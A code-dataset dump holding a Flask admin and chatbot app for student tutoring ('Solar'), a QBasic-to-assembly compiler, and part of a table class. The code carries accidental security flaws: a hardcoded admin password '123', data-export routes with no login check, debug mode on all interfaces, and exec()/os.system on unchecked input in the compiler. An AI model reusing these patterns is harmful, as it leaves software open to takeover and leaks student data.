de Tutor')\n sh.write(0, 3, 'Id de la carrera')\n sh.write(0, 4, 'Carrera')\n sh.write(0, 5, 'Id del alumno')\n sh.write(0, 6, 'Nombre de alumno')\n idx = 0\n for row in data:\n sh.write(idx+1, 0, str(row[0]))\n sh.write(idx+1, 1, row[1])\n sh.write(idx+1, 2, row[2])\n sh.write(idx+1, 3, str(row[3]))\n sh.write(idx+1, 4, row[4])\n sh.write(idx+1, 5, str(row[5]))\n sh.write(idx+1, 6, row[6])\n idx += 1\n\n workbook.save(output)\n output.seek(0)\n\n return Response(output, mimetype=\"application/ms-excel\", headers={\"Content-Disposition\":\"attachment;filename=Tutor_&_Estudiante.xls\"})\n\n\n@app.route('/download/report/excel/tutors')\ndef download_report_tutors():\n sql = \"SELECT tutores.id_tutor, tutores.nombre, tutores.correo, carreras.id_carrera, carreras.nombre AS carreras FROM tutores INNER JOIN carreras ON tutores.id_carrera = carreras.id_carrera;\";\n connection= mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n connection.commit()\n\n #output in bytes\n output = io.BytesIO()\n #create WorkBook object\n workbook = xlwt.Workbook()\n #add a sheet\n sh = workbook.add_sheet('Tutors Report')\n\n #add headers\n sh.write(0, 0, 'Nombre')\n sh.write(0, 1, 'Correo')\n sh.write(0, 2, 'Carrera')\n idx = 0\n for row in data:\n sh.write(idx+1, 0, row[1])\n sh.write(idx+1, 1, row[2])\n sh.write(idx+1, 2, row[4])\n idx += 1\n workbook.save(output)\n output.seek(0)\n return Response(output, mimetype=\"application/ms-excel\", headers={\"Content-Disposition\":\"attachment;filename=Tutores.xls\"})\n\n@app.route('/download/report/excel/students')\ndef download_report_students():\n sql = \"SELECT alumnos.id_alumno, alumnos.nombre, alumnos.correo, alumnos.codigo, carreras.id_carrera, carreras.nombre AS carreras FROM alumnos INNER JOIN carreras ON alumnos.id_carrera = carreras.id_carrera;\";\n connection= mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n connection.commit()\n\n #output in bytes\n output = io.BytesIO()\n #create WorkBook object\n workbook = xlwt.Workbook()\n #add a sheet\n sh = workbook.add_sheet('Students Report')\n\n #add headers\n sh.write(0, 0, 'Nombre')\n sh.write(0, 1, 'Correo')\n sh.write(0, 2, 'Código')\n sh.write(0, 3, 'Carrera')\n idx = 0\n for row in data:\n sh.write(idx+1, 0, row[1])\n sh.write(idx+1, 1, row[2])\n sh.write(idx+1, 2, row[3])\n sh.write(idx+1, 3, row[5])\n idx += 1\n workbook.save(output)\n output.seek(0)\n return Response(output, mimetype=\"application/ms-excel\", headers={\"Content-Disposition\":\"attachment;filename=Estudiantes.xls\"})\n\n\n@app.route('/download/report/excel/questions')\ndef download_report_questions():\n sql = \"SELECT preguntas.id_pregunta, preguntas.pregunta, preguntas.respuesta, keyword, etapas.etapa FROM preguntas JOIN etapas ON preguntas.id_etapa = etapas.id_etapa\";\n connection= mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n connection.commit()\n #output in bytes\n output = io.BytesIO()\n #create WorkBook object\n workbook = xlwt.Workbook()\n #add a sheet\n sh = workbook.add_sheet('Questions Report Solar')\n #add headers\n sh.write(0, 0, 'Pregunta')\n sh.write(0, 1, 'Respuesta')\n sh.write(0, 2, 'Palabra Clave')\n sh.write(0, 3, 'Etapa')\n idx = 0\n for row in data:\n sh.write(idx+1, 0, row[1])\n sh.write(idx+1, 1, row[2])\n sh.write(idx+1, 2, row[3])\n sh.write(idx+1, 3, row[4])\n idx += 1\n workbook.save(output)\n output.seek(0)\n return Response(output, mimetype=\"application/ms-excel\", 
headers={\"Content-Disposition\":\"attachment;filename=Preguntas_Solar.xls\"})\n\n@app.route('/importing/questions', methods=['GET', 'POST'])\ndef importing_questions():\n if request.method == 'POST':\n csv_file = request.files['csvfile']\n csv_file = TextIOWrapper(csv_file, encoding='utf-8')\n csv_reader = csv.reader(csv_file)\n connection = mysql.connect()\n cursor = connection.cursor()\n sql = \"INSERT INTO `preguntas` (`id_pregunta`, `pregunta`, `respuesta`, `keyword`, `id_etapa`) VALUES (NULL, %s, %s, %s, %s);\"\n for row in csv_reader:\n cursor.execute(sql,row)\n connection.commit()\n return \"ok\"\n return \"no\"\n\n@app.route(\"/sending-email\", methods=['POST','GET'])\n@login_required\ndef sending_email():\n body = request.form['body']\n name = request.form['name']\n if request.method == \"POST\" and body and name:\n msg = Message(\"¡Nueva Pregunta Sugerida!\", sender= 'holasoysolarelbot@gmail.com',recipients= [\"holasoysolarelbot@gmail.com\"])\n msg.body = \"¡Hola, Administrador!\\n¡Un alumno ha enviado una nueva sugerencia!\\nNombre: \"+name+\"\\nPregunta: \"+request.form.get(\"body\")+\"\\n¡Chécalo aquí!:\"+\"http://127.0.0.1:5000/emails\"\n with app.open_resource(\"static/images/character/new-suggest.jpeg\") as fp:\n msg.attach(\"new-suggest.jpeg\", \"image/jpeg\", fp.read())\n mail.send(msg)\n connection = mysql.connect()\n cursor = connection.cursor()\n sql = \"INSERT INTO `sugerencias` (`id_email`, `name`, `message`, `status`) VALUES (NULL, %s, %s,'Pendiente');\"\n data = (name,body)\n cursor.execute(sql,data)\n connection.commit()\n return render_template(\"student/result-email.html\", result=\"¡Sugerencia Enviada!\")\n else:\n return render_template(\"student/result-email.html\", result=\"Error, intenta nuevamente\")\n\n@app.route('/tutor-and-student')\n@admin_required\ndef tutor_and_student():\n try:\n sql = \"SELECT tutores.id_tutor, tutores.nombre, tutores.correo,carreras.id_carrera, carreras.nombre AS carrera, alumnos.id_alumno, alumnos.nombre AS alumnos FROM alumnos INNER JOIN carreras ON alumnos.id_carrera = carreras.id_carrera INNER JOIN tutores ON alumnos.id_tutor = tutores.id_tutor\";\n connection= mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n connection.commit()\n return render_template('tutor/tutor-and-student.html', data=data)\n except KeyError as e:\n print(e)\n return render_template('handling/error/error-form.html')\n\n@app.route('/emails')\n@admin_required\ndef emails():\n try:\n sql = \"SELECT * FROM sugerencias\";\n connection= mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n connection.commit()\n return render_template('tutor/emails.html', data=data)\n except KeyError as e:\n print(e)\n return render_template('handling/error/error-form.html')\n\n@app.route('/validate-suggest//')\n@admin_required\ndef validate_suggest(id):\n try:\n connection = mysql.connect()\n cursor = connection.cursor()\n cursor.execute(\"SELECT * FROM sugerencias WHERE id_email=%s\",(id))\n data = cursor.fetchall()\n connection.commit()\n return render_template('tutor/edit-suggest.html', data = data)\n except KeyError as e:\n print(e)\n return render_template('handling/error/error-form.html')\n\n@app.route('/storing-suggest', methods=['POST'])\n@admin_required\ndef storing_suggest():\n try:\n id_email = request.form['id_email']\n name = request.form['name']\n suggest = request.form['suggest']\n question = request.form['question']\n answer = request.form['answer']\n stage = 
request.form['stage']\n keyword = request.form['keyword']\n status = request.form['status']\n connection = mysql.connect()\n cursor = connection.cursor()\n if name and question and answer and suggest and status and id_email and stage and keyword and status and request.method == 'POST':\n sql = \"INSERT INTO `preguntas` (`id_pregunta`, `pregunta`, `respuesta`, `keyword`, `id_etapa`) VALUES (NULL, %s, %s, %s, %s);\"\n data = (question, answer, keyword, stage)\n cursor.execute(sql,data)\n connection.commit()\n connection.close()\n else:\n return render_template('handling/error/error-save.html')\n if id_email:\n sql1 = \"UPDATE sugerencias SET status = %s WHERE sugerencias.id_email =%s\"\n data = (status, id_email)\n connection = mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql1,data)\n connection.commit()\n connection.close()\n else:\n return render_template('handling/error/error-save.html')\n return render_template('handling/sucess/created.html')\n except KeyError as e:\n print(e)\n return render_template('handling/error/error-save.html')\n\n\n@app.route('/tutors')\n@admin_required\ndef tutors():\n try:\n sql = \"SELECT tutores.id_tutor, tutores.nombre, tutores.correo, carreras.id_carrera, carreras.nombre AS carreras FROM tutores INNER JOIN carreras ON tutores.id_carrera = carreras.id_carrera;\";\n connection= mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n connection.commit()\n return render_template('tutor/tutors.html', data=data)\n except KeyError as e:\n print(e)\n return render_template('handling/error/error-form.html')\n\n@app.route('/edit-tutor/<id_tutor>/<id_career>/')\n@admin_required\ndef edit_tutor(id_tutor,id_career):\n try:\n if 'pwd' in session:\n try:\n connection = mysql.connect()\n cursor = connection.cursor()\n cursor.execute(\"SELECT tutores.id_tutor, tutores.nombre, tutores.correo, carreras.id_carrera, carreras.nombre AS carreras FROM tutores INNER JOIN carreras ON tutores.id_carrera = carreras.id_carrera WHERE tutores.id_tutor=%s AND tutores.id_carrera=%s\",(id_tutor,id_career))\n data = cursor.fetchall()\n connection.commit()\n return render_template('tutor/edit-tutor.html', data=data)\n except Exception as e:\n print(e)\n return render_template('handling/error/error-edit-tutor.html')\n except KeyError as e:\n print(e)\n return \"Error\"\n\n@app.route('/edit-students/<id_student>/<id_career>/')\n@admin_required\ndef edit_students(id_student,id_career):\n try:\n connection = mysql.connect()\n cursor = connection.cursor()\n cursor.execute(\"SELECT alumnos.id_alumno, alumnos.nombre, alumnos.correo, alumnos.codigo, carreras.id_carrera, carreras.nombre AS carreras FROM alumnos INNER JOIN carreras ON alumnos.id_carrera = carreras.id_carrera WHERE alumnos.id_alumno =%s AND alumnos.id_carrera = %s;\",(id_student,id_career))\n data = cursor.fetchall()\n connection.commit()\n return render_template('tutor/edit-students.html', data=data)\n except KeyError as e:\n print(e)\n return redirect('/error-form')\n\n@app.route('/students')\n@admin_required\ndef students():\n try:\n sql = \"SELECT alumnos.id_alumno, alumnos.nombre, alumnos.correo, alumnos.codigo, carreras.id_carrera, carreras.nombre AS carreras FROM alumnos INNER JOIN carreras ON alumnos.id_carrera = carreras.id_carrera;\";\n connection= mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n connection.commit()\n return 
render_template('tutor/students.html', data=data)\n except KeyError as e:\n print(e)\n return redirect('/error-form')\n\n@app.route('/edit-tutor-and-student.html')\n@admin_required\ndef edit_tutor_and_student():\n try:\n sql = \"SELECT tutores.id_tutor, tutores.nombre, tutores.correo,carreras.id_carrera, carreras.nombre AS carrera, alumnos.id_alumno, alumnos.nombre AS alumnos FROM alumnos INNER JOIN carreras ON alumnos.id_carrera = carreras.id_carrera INNER JOIN tutores ON alumnos.id_tutor = tutores.id_tutor\";\n connection= mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n connection.commit()\n return render_template('tutor/students.html', data=data)\n except KeyError as e:\n print(e)\n return redirect('/error-form')\n\n@app.route('/form')\n@admin_required\ndef form():\n try:\n try:\n sql = \"SELECT preguntas.id_pregunta, preguntas.pregunta, preguntas.respuesta, keyword, etapas.etapa FROM preguntas JOIN etapas ON preguntas.id_etapa = etapas.id_etapa\";\n connection= mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n connection.commit()\n return render_template('tutor/form.html', data=data)\n except Exception as err:\n print(err)\n return redirect('/error-form')\n except KeyError as e:\n print(e)\n return redirect('/error-form')\n\n\n@app.route('/edit-question/<id>')\n@admin_required\ndef edit_question(id):\n try:\n connection = mysql.connect()\n cursor = connection.cursor()\n cursor.execute(\"SELECT * FROM preguntas WHERE id_pregunta=%s\",(id))\n data = cursor.fetchall()\n connection.commit()\n return render_template('tutor/edit-question.html', data = data)\n except KeyError as e:\n print(e)\n return \"Error\"\n\n\n@app.route('/update', methods=['POST'])\n@admin_required\ndef update():\n try:\n id_question = request.form['id']\n question = request.form['pregunta']\n answer = request.form['respuesta']\n keyword = request.form['keyword']\n stage = request.form['stage']\n if id_question and question and answer and keyword and stage and request.method == 'POST':\n sql = \"UPDATE preguntas SET pregunta=%s,respuesta=%s,keyword=%s, id_etapa=%s WHERE id_pregunta=%s;\"\n data =(question,answer,keyword,stage,id_question)\n connection = mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql,data)\n connection.commit()\n return render_template('handling/sucess/updated.html')\n else:\n return render_template('handling/error/error-update.html')\n except KeyError as e:\n print(e)\n return render_template('handling/error/error-update.html')\n\n@app.route('/update-tutor', methods=['POST'])\n@admin_required\ndef update_tutor():\n try:\n tutor_id = request.form['tutor_id']\n tutor_name = request.form['tutor_name']\n tutor_email = request.form['tutor_email']\n tutor_career = request.form['tutor_career']\n if tutor_id and tutor_name and tutor_email and tutor_career and request.method == 'POST':\n sql = \"UPDATE `tutores` SET `nombre` = %s, `correo` =%s, `id_carrera` = %s WHERE `tutores`.`id_tutor` = %s;\"\n data =(tutor_name,tutor_email,tutor_career,tutor_id)\n connection = mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql,data)\n connection.commit()\n return render_template('handling/sucess/updated.html')\n else:\n return 
render_template('handling/error/error-update.html')\n except KeyError as e:\n print(e)\n return render_template('handling/error/error-update.html')\n\n@app.route('/update-students', methods=['POST'])\n@admin_required\ndef update_students():\n try:\n id_student= request.form['id_student']\n id_career= request.form['id_career']\n name_student = request.form['name_student']\n email_student = request.form['email_student']\n code_student = request.form['code_student']\n career_student = request.form['career_student']\n if id_student and id_career and name_student and email_student and code_student and career_student and request.method == 'POST':\n sql = \"UPDATE alumnos SET nombre = %s,correo = %s, codigo =%s, id_carrera =%s WHERE alumnos.id_alumno =%s\"\n data =(name_student,email_student,code_student,id_career,id_student)\n connection = mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql,data)\n connection.commit()\n return render_template('handling/sucess/updated.html')\n else:\n return render_template('handling/error/error-update.html')\n except KeyError as e:\n print(e)\n return \"Error\"\n\n#Chatbot\n@app.route('/get')\ndef get():\n userText = request.args.get('msg')\n if userText == \"hola\":\n return str(\"¡Hola, soy Solar!☀️🤖\\n Estoy a tus órdenes😊\")\n if re.match(\"^[0-9]{9}$\", userText):\n connection = mysql.connect()\n cursor=connection.cursor()\n row = cursor.execute(\"SELECT tutores.nombre from tutores join alumnos on tutores.id_tutor = alumnos.id_tutor where alumnos.codigo = %s\", (userText,))\n connection.commit()\n data = cursor.fetchall()\n if row == 1:\n result = \" \".join(str(x) for x in data)\n result = result.replace(\"(\",\"\").replace(\")\",\"\").replace(\"'\",\"\").replace(\"\\\\n\",\" \").replace(\"\\\\r\",\" \").replace(\"\\\\\",\" \")\n result = result.replace(\",\",\" \")\n return \"Claro, tu tutor/tutora es: \"+result\n else:\n return \"No encontramos tu tutor, intenta nuevamente\"\n connection = mysql.connect()\n cursor=connection.cursor()\n row = cursor.execute(\"SELECT respuesta FROM preguntas WHERE keyword = %s\", (userText,))\n connection.commit()\n data = cursor.fetchall()\n print(data)\n if row == 1:\n result = \" \".join(str(x) for x in data)\n result = result.replace(\"(\",\"\").replace(\")\",\"\").replace(\"'\",\"\").replace(\"\\\\n\",\" \").replace(\"\\\\r\",\" \").replace(\"\\\\\",\" \")\n result = result.replace(\",\",\" \")\n print(result)\n answer = random.choice(answers)\n return answer+result\n withoutanswer = random.choice(without_answers)\n return withoutanswer\n\n@app.route('/storage', methods=['POST'])\n@admin_required\ndef storage():\n try:\n question = request.form['pregunta']\n answer = request.form['respuesta']\n keyword = request.form['keyword']\n stage = request.form['stage']\n connection = mysql.connect()\n cursor = connection.cursor()\n if question and answer and keyword and stage and request.method == 'POST':\n sql = \"INSERT INTO `preguntas` (`id_pregunta`, `pregunta`, `respuesta`, `keyword`, `id_etapa`) VALUES (NULL, %s, %s, %s, %s);\"\n data = (question, answer, keyword, stage)\n cursor.execute(sql,data)\n connection.commit()\n return render_template('handling/sucess/created.html')\n else:\n return render_template('handling/error/error-save.html')\n except KeyError as e:\n print(e)\n return \"Error\"\n\n@app.route('/storage-tutor', methods=['POST'])\n@admin_required\ndef storage_tutor():\n try:\n name = request.form['name']\n email = 
request.form['email']\n career = request.form['career']\n connection = mysql.connect()\n cursor = connection.cursor()\n if name and email and career and request.method == 'POST':\n sql = \"INSERT INTO `tutores` (`id_tutor`, `nombre`, `correo`, `id_carrera`) VALUES (NULL,%s, %s,%s);\"\n data = (name, email, career)\n cursor.execute(sql,data)\n connection.commit()\n return render_template('handling/sucess/created.html')\n else:\n return render_template('handling/error/error-save.html')\n except KeyError as e:\n print(e)\n return render_template('handling/error/error-save.html')\n\n@app.route('/storage-student', methods=['POST'])\n@admin_required\ndef storage_student():\n try:\n name = request.form['name']\n email = request.form['email']\n career = request.form['career']\n code = request.form['code']\n tutor = request.form['tutor']\n connection = mysql.connect()\n cursor = connection.cursor()\n if name and email and career and code and tutor and request.method == 'POST':\n sql = \"INSERT INTO `alumnos` (`id_alumno`, `nombre`, `correo`, `codigo`, `id_carrera`, `id_tutor`) VALUES (NULL, %s, %s, %s, %s, %s);\"\n data = (name, email, code, career, tutor)\n cursor.execute(sql,data)\n connection.commit()\n return render_template('handling/sucess/created.html')\n else:\n return render_template('handling/error/error-save.html')\n except KeyError as e:\n print(e)\n return render_template('handling/error/error-save.html')\n\n@app.route('/verify-student', methods=['POST'])\ndef verify_student():\n studentCode = request.form['code']\n if studentCode and re.match(\"^[0-9]{9}$\", studentCode) and request.method == 'POST':\n connection = mysql.connect()\n cursor=connection.cursor()\n cursor.execute(\"SELECT codigo FROM alumnos WHERE codigo = %s\", (studentCode,))\n connection.commit()\n data = cursor.fetchall()\n result = \" \".join(str(x) for x in data)\n result = result.replace(\"(\",\"\").replace(\")\",\"\").replace(\",\",\" \").replace(\" \",\"\")\n if studentCode == result:\n connection = mysql.connect()\n cursor=connection.cursor()\n cursor.execute(\"SELECT nombre FROM alumnos WHERE codigo = %s\", (studentCode,))\n connection.commit()\n name = cursor.fetchall()\n value = \" \".join(str(x) for x in name)\n value = value.replace(\"(\",\"\").replace(\")\",\"\").replace(\",\",\" \").replace(\"'\",\"\")\n session['studentCode'] = studentCode\n session.permanent = True\n app.permanent_session_lifetime = timedelta(minutes=120)\n return redirect('/solar')\n return render_template('handling/error/error-login-student.html')\n\n@app.route('/verify-master', methods=['POST'])\ndef verify_master():\n pwd = request.form['pwd']\n if request.method == 'POST' and pwd == '123':\n session['pwd'] = pwd\n key = secrets.token_urlsafe(5)\n q.put(key)\n print(q.queue)\n msg = Message(\"🔑¡Llave Secreta!🔑\", sender= 'holasoysolarelbot@gmail.com',recipients= [\"holasoysolarelbot@gmail.com\"])\n msg.body = \"¡Hola, Administrador!👋\\n ¡Para poder proceder necesitamos la palabra clave!\\n\"+\"Key:\"+key+\"\\n¡Chécalo!👀\"\n mail.send(msg)\n return render_template('tutor/verify-key.html')\n else:\n return render_template('handling/error/error-login-master.html')\n\n@app.route('/request-code', methods=['POST'])\ndef request_code():\n original_key = q.get(1)\n print(q.queue)\n email_key = request.form['key']\n if original_key == email_key:\n session.permanent = True\n app.permanent_session_lifetime = timedelta(minutes=120)\n q.queue.clear()\n print(q.queue)\n del original_key, email_key\n return redirect('/form')\n else:\n 
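 # Key mismatch: q.get() above already consumed the stored one-time key,
 # and clearing the queue below throws away any stale keys, so a failed
 # attempt cannot be retried against an old key.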
q.queue.clear()\n del original_key, email_key\n return render_template('handling/error/error-key.html')\n\n\n@app.route('/logout-student')\ndef logout_student():\n session.pop('studentCode',None)\n session.permanent = False\n return redirect('/login')\n\n@app.route('/logout-master')\ndef logout_master():\n session.pop('pwd',None)\n session.permanent = False\n return redirect('/master-login')\n\nif __name__== '__main__':\n app.run(host= '0.0.0.0',port=5000, debug=True)\n","repo_name":"tristanhdez/Solar","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":29827,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"35533596329","text":"import sys\nimport os\nverbose = False\nclass CCerr(Exception):\n def __init__(self, message, keyword):\n print(\"qbpycc: error \"+message+\" :\\n\"+keyword)\n exit(1)\nclass Nasmsheet:\n def printk(self, keyword):\n if '\"' not in keyword:\n for letter in keyword:\n if letter.isdigit():\n #probably has something to deal with math\n keyword1 = keyword[keyword.index(letter):]\n # Look, imagine we have PRINT 5+10\n # Parsing it could be very difficult and also not efficient\n # Temporary solution is just doing calculation in Python shell\n # So, we just do self.printstring = *insert calculations here*\n # But it won`t work in any other way\n # Need parser very much\n exec(\"self.printstring = str({})\".format(keyword1))\n # We already have number how much times has PRINT called\n # So we increase it by 1, do printstring*insertnumberhere*: db \"*insert value here*\", 10\n self.data = self.data + \"printstring{}: \".format(str(self.mctr+1))+'db \"{}\", 10\\n'.format(self.printstring)\n self.mctr += 1\n self.text = self.text + \"mov rax, 1\\nmov rdi, 1\\nmov rsi, {}\\nmov rdx, {}\\nsyscall\\n\".format(\"printstring\"+str(self.mctr), len(self.printstring)+1)\n self.printstring = \"\"\n return\n for letter in keyword:\n if letter == '\"' or letter == \"'\":\n # Found \"!\n # Cutting string before \"!\n keyword1 = keyword[keyword.index(letter):]\n # Then searching for another one \" or '\n for lette in keyword1:\n if lette == '\"' or lette == \"'\":\n # Found second \"!\n # slicing string\n keyword1 = keyword1[keyword1.index(letter)+1:]\n keyword1 = keyword1[:-1]\n # Got it, break from cycle\n self.printstring = keyword1\n break\n for letter in keyword:\n # Huh, it looks like we have ; symbol\n # It means that after that symbol it is an variable OR EXPRESSION!\n if letter == \";\" and (keyword[keyword.index(letter)-1] == '\"' or keyword[keyword.index(letter)-1] == \"'\"):\n # If we have it in internal buffer, just add it to string!\n vari = keyword[keyword.index(letter):]\n if vari in self.var:\n self.printstring = self.printstring + self.varcontent[self.var.index(vari)]\n # Honestly, think that that internal buffer wasn't a good idea\n # Need parser EVEN MORE\n # doing the same thing as earlier\n self.data = self.data + \"printstring{}: \".format(str(self.mctr+1))+'db \"{}\", 10\\n'.format(self.printstring)\n self.mctr += 1\n # To perform a PRINT syscall we need rax set to OUTPUT, rdi set to STDOUT, rsi set to adress of string, and rdx set to lenght of it.\n # Just insert it here\n self.text = self.text + \"mov rax, 1\\nmov rdi, 1\\nmov rsi, {}\\nmov rdx, {}\\nsyscall\\n\".format(\"printstring\"+str(self.mctr), len(self.printstring)+1)\n self.printstring = \"\"\n def export(self):\n sheet = \"bits 64\\nsection .bss\\n\" #section bss\n sheet = sheet + self.bss\n sheet = sheet+\"section 
.text\\n\" #code section\n sheet = sheet+\"global _start\\n\" #entry label\n sheet = sheet+\"_start:\\n\"\n sheet = sheet + self.text\n sheet = sheet+\"section .data\\n\" #section data\n sheet = sheet + self.data\n sheet = sheet + \"\\n\"\n return sheet\n def interpretall(self):\n for word in self.content:\n try:\n self.interpret(word)\n except:\n # If we even hit an internal Python error, we should quit, can't proceed further, needs bugfix\n raise CCerr(\"general compiler error\", word)\n def __init__(self, content, isFullcc):\n self.content = content\n self.text = \"\"\n self.bss = \"\"\n self.data = \"\"\n self.printstring = \"\"\n self.var = []\n self.varcontent = []\n self.mctr = 0\n self.fcc = isFullcc\n self.varb = \"\"\n def interpret(self, keyword):\n if keyword[:3] == \"REM\" or keyword[:1] == \"'\":\n # REM or ' are comments\n keyword1 = keyword[1:]\n # This is a tricky thing. Python don't know is it a REM or a '\n # We can cutoff first symbol immedeately\n # I've done stupid thing there, if second letter is E than assume it's a REM\n # But if we encounter something like 'EEEEE it will cutoff some characters\n # Bugfix is pretty easy though\n if keyword1[0] == \"E\":\n keyword1 = keyword1[2:]\n self.text = self.text + \";\"+keyword1+\"\\n\"\n return\n elif keyword[:5] == \"INPUT\":\n if self.fcc:\n self.text = self.text + \";;;;;;;;;;;;;;;;;;;;\\n;{}\\n;;;;;;;;;;;;;;;;;;;;\\n\".format(keyword)\n keyword1 = keyword[5:]\n for letter in keyword1:\n if letter == \";\":\n # Find the variable to store input\n keyword1w = keyword1.split(\";\")[0]\n keyword1var = keyword1.split(\";\")[1]\n # Call printk\n self.printk(keyword1w)\n # Reserve 1024B for the buffer\n self.bss = self.bss + keyword1var+\": resb 1024\\n\" # for now only 1024 B\n # To perform a INPUT, we need rax set to INPUT, rdi set to STDIN, rsi set to variable, rdx set to size in bytes\n self.text = self.text + \"mov rax, 0\\nmov rdi, 0\\nmov rsi, {}\\nmov rdx, 1024\\nsyscall\\n\".format(keyword1var)\n elif keyword == \"END\":\n if self.fcc:\n self.text = self.text + \";;;;;;;;;;;;;;;;;;;;\\n;{}\\n;;;;;;;;;;;;;;;;;;;;\\n\".format(keyword)\n # To end the program, we need RAX set to 60, rdi set to 0\n self.text = self.text + \"mov rax, 60\\nxor rdi, rdi\\nsyscall\\n\"\n elif keyword == \"CLS\":\n # CLS reason in all QBASIC programs is clearing the screen\n # But we can't clear STDOUT\n # So just skip it!\n if self.fcc:\n self.text = self.text + \";;;;;;;;;;;;;;;;;;;;\\n;{}\\n;;;;;;;;;;;;;;;;;;;;\\n\".format(keyword)\n return\n elif keyword[:5] == \"PRINT\":\n # Already explained\n varflag = False\n if self.fcc:\n self.text = self.text + \";;;;;;;;;;;;;;;;;;;;\\n;{}\\n;;;;;;;;;;;;;;;;;;;;\\n\".format(keyword)\n for letter in keyword:\n if letter == \";\" and (keyword[keyword.index(letter)-1] == '\"' or keyword[keyword.index(letter)-1] == \"'\"):\n vari = keyword[keyword.index(letter)+1:]\n keyword = keyword.split(\";\")[0]\n varflag = True\n self.varb = vari\n if '\"' not in keyword:\n for letter in keyword:\n if letter.isdigit():\n #probably a MATH\n keyword1 = keyword[keyword.index(letter):]\n #using Python to MATH, I am not crazy to parse it by myself\n exec(\"self.printstring = str({})\".format(keyword1))\n self.data = self.data + \"printstring{}: \".format(str(self.mctr+1))+'db \"{}\", 10\\n'.format(self.printstring)\n self.mctr += 1\n self.text = self.text + \"mov rax, 1\\nmov rdi, 1\\nmov rsi, {}\\nmov rdx, {}\\nsyscall\\n\".format(\"printstring\"+str(self.mctr), len(self.printstring)+1)\n self.printstring = \"\"\n 
return\n for letter in keyword:\n if letter == '\"' or letter == \"'\":\n keyword1 = keyword[keyword.index(letter):]\n for lette in keyword1:\n if lette == '\"' or lette == \"'\":\n keyword1 = keyword1[keyword1.index(letter)+1:]\n keyword1 = keyword1[:-1]\n self.printstring = keyword1\n break\n \n self.data = self.data + \"printstring{}: \".format(str(self.mctr+1))+'db \"{}\", 10\\n'.format(self.printstring)\n self.mctr += 1\n self.text = self.text + \"mov rax, 1\\nmov rdi, 1\\nmov rsi, {}\\nmov rdx, {}\\nsyscall\\n\".format(\"printstring\"+str(self.mctr), len(self.printstring)+1)\n self.printstring = \"\"\n if varflag:\n vari = self.varb\n # indexable by compiler\n if vari in self.var:\n self.printstring = self.printstring + self.varcontent[self.var.index(vari)]\n # not indexable by compiler or doesnt exist AT ALL\n else:\n self.text = self.text + \"mov rax, 1\\nmov rdi, 1\\nmov rsi, {}\\nmov rdx, 1024\\nsyscall\\n\".format(vari)\n elif keyword[:3] == \"LET\":\n if self.fcc:\n self.text = self.text + \";;;;;;;;;;;;;;;;;;;;\\n;{}\\n;;;;;;;;;;;;;;;;;;;;\\n\".format(keyword)\n # First, cutoff these LET characters\n keyword1 = keyword[3:]\n # Then, remove ANY whitespaces\n keyword1 = keyword1.replace(\" \", \"\")\n # Split by \"=\"\n varname = keyword1.split(\"=\")[0]\n varc = keyword1.split(\"=\")[1]\n # varname should be a name of variable\n # varcontent - it's content\n # write values to DATA sections\n self.data = self.data + varname+ ': db \"{}\", 10\\n'.format(varc)\n # However, USE internal buffer too\n self.var.append(varname)\n self.varcontent.append(varc)\n else:\n raise CCerr(\"Not implemented or not an instruction\", keyword)\n\ndef main():\n fullCC = False\n if \"-v\" in sys.argv:\n global verbose\n verbose = True\n print(\"QBpycc: QBasic interpreter to native x86 assembly using Linux syscalls\")\n print(\"Accessing sources...\")\n if \"--help\" in sys.argv:\n print(\"Additional args:\\n-f -comment the process in the temporary file\\n-T - pass the document to stdout\\n-v - more verbosity\\n-s - save temporary files\")\n try:\n r = sys.argv[1:]\n source = r[0]\n output = r[1]\n except IndexError:\n print(\"Usage: qbpycc file.bas output.bin *additional args*\")\n exit(1)\n if \"-f\" in sys.argv:\n fullCC = True\n sourcehandle = open(source, \"r\")\n content = sourcehandle.readlines()\n content = [x.strip() for x in content]\n if verbose:\n print(\"Interpreting...\")\n sheet = Nasmsheet(content, fullCC)\n sheet.interpretall()\n shee = sheet.export()\n outputhandle = open(\"qbpycc.tmp\", \"w+\")\n outputhandle.write(shee)\n outputhandle.close()\n if verbose:\n print(\"Using NASM...\")\n os.system(\"nasm -felf64 qbpycc.tmp\")\n if verbose:\n print(\"Linking...\")\n if \"-T\" in sys.argv:\n print(shee)\n os.system(\"ld qbpycc.o -o \"+output)\n sourcehandle.close()\n if \"-s\" not in sys.argv:\n os.remove(\"qbpycc.o\")\n os.remove(\"qbpycc.tmp\")\nif __name__ == \"__main__\":\n main()\n","repo_name":"nergzd723/qbpycc","sub_path":"qbpycc.py","file_name":"qbpycc.py","file_ext":"py","file_size_in_byte":11537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31214341338","text":"#!/usr/bin/env python\n#coding:utf8\n#author:xdsecret1@gmail.com\n\nfrom table import Table\n\nclass GuildTechEffect(Table):\n def __init__(self, cur, wb):\n Table.sheet_name = u'guildtecheffect(联盟科技效果)'\n Table.sql = 'select * from guildtecheffect'\n Table.titles = (u'ID', u'科技ID', u'科技等级', u'科技名称', u'效果名称', u'效果描述', u'图片路径', u'联盟Con', u'升次数', u'升级荣誉', 
